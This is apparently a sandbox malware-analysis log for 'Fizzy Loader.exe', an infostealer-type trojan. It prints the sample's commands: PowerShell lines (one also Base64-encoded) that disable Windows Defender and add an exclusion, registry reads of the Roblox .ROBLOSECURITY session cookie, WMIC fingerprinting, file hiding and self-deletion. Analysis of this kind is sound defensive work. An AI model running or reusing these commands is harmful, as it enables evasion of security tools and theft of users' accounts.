                        Source: ukUGV.scr.0.dr, -----.csBase64 encoded string: 'U2V0LU1wUHJlZmVyZW5jZSAtRGlzYWJsZUludHJ1c2lvblByZXZlbnRpb25TeXN0ZW0gJHRydWUgLURpc2FibGVJT0FWUHJvdGVjdGlvbiAkdHJ1ZSAtRGlzYWJsZVJlYWx0aW1lTW9uaXRvcmluZyAkdHJ1ZSAtRGlzYWJsZVNjcmlwdFNjYW5uaW5nICR0cnVlIC1FbmFibGVDb250cm9sbGVkRm9sZGVyQWNjZXNzIERpc2FibGVkIC1FbmFibGVOZXR3b3JrUHJvdGVjdGlvbiBBdWRpdE1vZGUgLUZvcmNlIC1NQVBTUmVwb3J0aW5nIERpc2FibGVkIC1TdWJtaXRTYW1wbGVzQ29uc2VudCBOZXZlclNlbmQgJiYgcG93ZXJzaGVsbCBTZXQtTXBQcmVmZXJlbmNlIC1TdWJtaXRTYW1wbGVzQ29uc2VudCAy'
                        Source: ukUGV.scr.0.dr, -----.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                        Source: ukUGV.scr.0.dr, -----.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: Fizzy Loader.exe, -----.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                        Source: Fizzy Loader.exe, -----.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: classification engine Classification label: mal100.troj.adwa.spyw.evad.winEXE@40/24@3/2
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Fizzy Loader.exe.log
                        Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4820:120:WilError_03
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe Mutant created: \Sessions\1\BaseNamedObjects\HKQNYcyfGFyt4qEz2DFc
                        Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3136:120:WilError_03
                        Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4308:120:WilError_03
                        Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6656:120:WilError_03
                        Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7124:120:WilError_03
                        Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3876:120:WilError_03
                        Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3720:120:WilError_03
                        Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5000:120:WilError_03
                        Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1440:120:WilError_03
                        Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6504:120:WilError_03
                        Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6428:120:WilError_03
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe File created: C:\Users\user\AppData\Local\Temp\6q9sUybuLkTYpBG
                        Source: Fizzy Loader.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: Fizzy Loader.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe File read: C:\Windows\System32\drivers\etc\hosts
                        Source: JZ0HaEj6FntZgfK.0.dr, WfftaKcf4Djlzm1.0.dr Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                        Source: Fizzy Loader.exe ReversingLabs: Detection: 73%
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe File read: C:\Users\user\Desktop\Fizzy Loader.exe
                        Source: unknown Process created: C:\Users\user\Desktop\Fizzy Loader.exe "C:\Users\user\Desktop\Fizzy Loader.exe"
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe Process created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" csproduct get uuid
                        Source: C:\Windows\System32\wbem\WMIC.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe Process created: C:\Windows\System32\attrib.exe "attrib.exe" +h +s "C:\Users\user\Desktop\Fizzy Loader.exe"
                        Source: C:\Windows\System32\attrib.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Fizzy Loader.exe'
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe Process created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" os get Caption
                        Source: C:\Windows\System32\wbem\WMIC.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe Process created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" computersystem get totalphysicalmemory
                        Source: C:\Windows\System32\wbem\WMIC.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe Process created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" csproduct get uuid
                        Source: C:\Windows\System32\wbem\WMIC.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe Process created: C:\Windows\System32\wbem\WMIC.exe "wmic" path win32_VideoController get name
                        Source: C:\Windows\System32\wbem\WMIC.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c ping localhost && del /F /A h "C:\Users\user\Desktop\Fizzy Loader.exe" && pause
                        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping localhost
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dllJump to behavior
                        Source: C:\Windows\System32\attrib.exeSection loaded: ulib.dllJump to behavior
                        Source: C:\Windows\System32\attrib.exeSection loaded: fsutilext.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
